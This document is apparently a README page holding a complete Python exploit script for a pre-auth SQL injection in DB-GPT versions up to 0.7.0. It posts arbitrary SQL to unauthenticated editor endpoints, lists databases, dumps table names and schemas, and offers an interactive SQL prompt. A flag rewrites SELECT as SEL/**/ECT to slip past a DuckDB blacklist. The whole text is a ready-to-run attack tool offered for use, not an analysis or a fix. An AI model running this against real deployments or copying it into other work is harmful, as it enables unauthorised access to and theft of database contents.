README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection
Affected: eosphoros-ai/DB-GPT <= 0.7.0
Endpoint: /api/v1/editor/sql/run, /api/v1/editor/chart/run
Type: Pre-Auth SQL Injection (bypass of CVE-2024-10835 / CVE-2024-10901 fix)
The sanitize_sql blacklist only covers DuckDB. MySQL/PostgreSQL/SQLite
connections pass raw SQL directly to query_ex() with no filtering.
DuckDB blacklist can be bypassed with comment obfuscation (SEL/**/ECT).
Usage:
python3 exp.py <target> <db_name> [--sql "SELECT ..."]
python3 exp.py <target> <db_name> --dump-tables
python3 exp.py <target> <db_name> --dump-db
python3 exp.py <target> --list-dbs
"""
import argparse
import json
import sys
import requests
def sql_run(target, db_name, sql):
    """POST a SQL statement to the editor ``sql/run`` endpoint.

    Args:
        target: Base URL of the service; a trailing ``/`` is stripped.
        db_name: Value sent as ``db_name`` in the JSON body.
        sql: Statement sent as ``sql`` in the JSON body.

    Returns:
        ``(columns, values)`` taken from the ``data`` object of a reply
        whose ``success`` field is truthy, otherwise ``(None, None)``.
        Any exception raised while sending or decoding is reported on
        stderr and also yields ``(None, None)``.
    """
    endpoint = f"{target.rstrip('/')}/api/v1/editor/sql/run"
    body = {"db_name": db_name, "sql": sql}
    try:
        reply = requests.post(endpoint, json=body, timeout=30).json()
        if not reply.get("success"):
            print(f"[-] Error: {reply.get('err_msg', 'unknown')}", file=sys.stderr)
            return None, None
        result = reply.get("data", {})
        # NOTE(review): "colunms" (sic) presumably mirrors the key the server
        # actually emits -- confirm against a live response before "fixing" it.
        return result.get("colunms", []), result.get("values", [])
    except Exception as exc:
        print(f"[-] Request failed: {exc}", file=sys.stderr)
        return None, None
def chart_run(target, db_name, sql, chart_type="bar"):
    """POST a SQL statement to the editor ``chart/run`` endpoint.

    Args:
        target: Base URL of the service; a trailing ``/`` is stripped.
        db_name: Value sent as ``db_name`` in the JSON body.
        sql: Statement sent as ``sql`` in the JSON body.
        chart_type: Value sent as ``chart_type`` (defaults to ``"bar"``).

    Returns:
        The reply's ``data`` field (``{}`` when absent) if ``success`` is
        truthy, otherwise ``None``. Any exception raised while sending or
        decoding is reported on stderr and also yields ``None``.
    """
    endpoint = f"{target.rstrip('/')}/api/v1/editor/chart/run"
    body = {"db_name": db_name, "sql": sql, "chart_type": chart_type}
    try:
        reply = requests.post(endpoint, json=body, timeout=30).json()
        if not reply.get("success"):
            print(f"[-] Error: {reply.get('err_msg', 'unknown')}", file=sys.stderr)
            return None
        return reply.get("data", {})
    except Exception as exc:
        print(f"[-] Request failed: {exc}", file=sys.stderr)
        return None
def list_databases(target):
    """GET the editor ``db/list`` endpoint and return its ``data`` payload.

    Args:
        target: Base URL of the service; a trailing ``/`` is stripped.

    Returns:
        The reply's ``data`` field (``[]`` when absent) if ``success`` is
        truthy, otherwise ``None``. An unsuccessful reply is not reported;
        an exception while sending or decoding is printed to stderr.
    """
    endpoint = f"{target.rstrip('/')}/api/v1/editor/db/list"
    try:
        reply = requests.get(endpoint, timeout=10).json()
        return reply.get("data", []) if reply.get("success") else None
    except Exception as exc:
        print(f"[-] Request failed: {exc}", file=sys.stderr)
        return None
def print_table(columns, values):
    """Print a result set to stdout as an aligned, pipe-separated table.

    Only ``None`` cells are rendered as ``NULL``; other falsy values such
    as ``0``, ``False`` or the empty string are printed as themselves.

    Args:
        columns: Sequence of column headers. Nothing is printed when it is
            empty or ``None``.
        values: Iterable of rows (each a sequence of cells). ``None`` is
            treated as "no rows".

    Returns:
        None. Output is the header, a separator, one line per row, a blank
        line and a ``(N rows)`` footer.
    """
    if not columns:
        return

    def render(cell):
        # Test identity against None so real data like 0 or "" is not
        # misreported as NULL.
        return "NULL" if cell is None else str(cell)

    rows = [[render(cell) for cell in row] for row in (values or [])]

    widths = [len(str(name)) for name in columns]
    for row in rows:
        for idx, text in enumerate(row):
            if idx < len(widths):
                widths[idx] = max(widths[idx], len(text))
            else:
                # A row wider than the header: track the extra cell instead
                # of failing with IndexError.
                widths.append(len(text))

    print(" | ".join(str(name).ljust(widths[idx]) for idx, name in enumerate(columns)))
    print("-+-".join("-" * width for width in widths))
    for row in rows:
        print(" | ".join(text.ljust(widths[idx]) for idx, text in enumerate(row)))
    print(f"\n({len(rows)} rows)")
def detect_db_type(target, db_name):
    """Guess the backing database engine from its version string.

    Issues ``SELECT VERSION()`` through ``sql_run`` and classifies the first
    cell of the first row; if that gives no answer, tries
    ``SELECT sqlite_version()``.

    Args:
        target: Base URL passed through to ``sql_run``.
        db_name: Database name passed through to ``sql_run``.

    Returns:
        One of ``"postgresql"``, ``"mariadb"``, ``"mysql"``, ``"sqlite"`` or
        ``"unknown"``.
    """
    cols, vals = sql_run(target, db_name, "SELECT VERSION()")
    if cols and vals and vals[0]:
        version = str(vals[0][0]).lower()
        # PostgreSQL must be checked before the generic "." test: it answers
        # VERSION() too, with a dotted string, and would otherwise be
        # reported as MySQL.
        if "postgresql" in version:
            return "postgresql"
        if "mariadb" in version:
            return "mariadb"
        # NOTE(review): any other dotted version string is assumed to be
        # MySQL; engines with a similar VERSION() output land here as well.
        if "." in version:
            return "mysql"

    cols, vals = sql_run(target, db_name, "SELECT sqlite_version()")
    if cols and vals:
        return "sqlite"
    return "unknown"
def main():
    """Parse the command line and run the selected mode.

    Modes are checked in this order and the first match wins:
    ``--list-dbs``, ``--sql``, ``--dump-tables``, ``--dump-db``; with none of
    them an interactive ``SQL>`` prompt is started. Every mode except
    ``--list-dbs`` requires the positional ``db_name``.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection"
    )
    parser.add_argument("target", help="Target URL (e.g. http://localhost:5670)")
    parser.add_argument("db_name", nargs="?", help="Database name")
    parser.add_argument("--sql", help="Custom SQL to execute")
    # NOTE: --chart is accepted here but nothing below reads args.chart.
    boolean_flags = (
        ("--list-dbs", "List available databases"),
        ("--dump-tables", "Dump table names"),
        ("--dump-db", "Dump all table structures"),
        ("--chart", "Use chart endpoint instead"),
        ("--duckdb-bypass", "Use comment obfuscation for DuckDB"),
    )
    for flag, description in boolean_flags:
        parser.add_argument(flag, action="store_true", help=description)
    args = parser.parse_args()

    def rewrite(statement):
        # Applied only when --duckdb-bypass was given.
        if args.duckdb_bypass:
            return statement.replace("SELECT", "SEL/**/ECT")
        return statement

    def run_and_show(statement):
        # Execute one statement and print the table if columns came back.
        columns, rows = sql_run(args.target, args.db_name, statement)
        if columns:
            print_table(columns, rows)

    print("[*] CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection")
    print(f"[*] Target: {args.target}")

    if args.list_dbs:
        dbs = list_databases(args.target)
        if not dbs:
            print("[-] No databases found or endpoint not accessible")
            return
        print(f"\n[+] Found {len(dbs)} database(s):")
        for db in dbs:
            # Entries may be dicts or plain values; handle both.
            if isinstance(db, dict):
                name = db.get("db_name", db)
                db_type = db.get("db_type", "?")
            else:
                name, db_type = db, "?"
            print(f" - {name} ({db_type})")
        return

    if not args.db_name:
        parser.error("db_name is required unless using --list-dbs")

    if args.sql:
        statement = rewrite(args.sql)
        print(f"[*] Executing: {statement}\n")
        run_and_show(statement)
        return

    if args.dump_tables:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")
        mysql_tables = (
            "SELECT table_name FROM information_schema.tables "
            "WHERE table_schema = DATABASE()"
        )
        table_queries = {
            "mysql": mysql_tables,
            "mariadb": mysql_tables,
            "postgresql": (
                "SELECT table_name FROM information_schema.tables "
                "WHERE table_schema = 'public'"
            ),
            "sqlite": "SELECT name FROM sqlite_master WHERE type='table'",
        }
        statement = table_queries.get(
            db_type, "SELECT table_name FROM information_schema.tables"
        )
        print("[*] Dumping tables...\n")
        run_and_show(statement)
        return

    if args.dump_db:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")

        if db_type == "sqlite":
            # SQLite: list the tables first, then PRAGMA each one.
            name_cols, name_rows = sql_run(
                args.target,
                args.db_name,
                "SELECT name FROM sqlite_master WHERE type='table'",
            )
            if name_cols and name_rows:
                for entry in name_rows:
                    table = entry[0]
                    print(f"\n[*] Table: {table}")
                    run_and_show(f"PRAGMA table_info('{table}')")
            return

        statement = (
            "SELECT table_name, column_name, data_type "
            "FROM information_schema.columns"
        )
        schema_expr = {
            "mysql": "DATABASE()",
            "mariadb": "DATABASE()",
            "postgresql": "'public'",
        }.get(db_type)
        if schema_expr is not None:
            statement += (
                f" WHERE table_schema = {schema_expr}"
                " ORDER BY table_name, ordinal_position"
            )
        print("[*] Dumping schema...\n")
        run_and_show(statement)
        return

    # Default: interactive mode
    print(f"[*] Database: {args.db_name}")
    print("[*] Interactive SQL mode. Type 'exit' to quit.\n")
    while True:
        try:
            line = input("SQL> ").strip()
        except (EOFError, KeyboardInterrupt):
            print()
            break
        # An empty line ends the session just like "exit".
        if not line or line.lower() == "exit":
            break
        run_and_show(rewrite(line))
        print()
# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()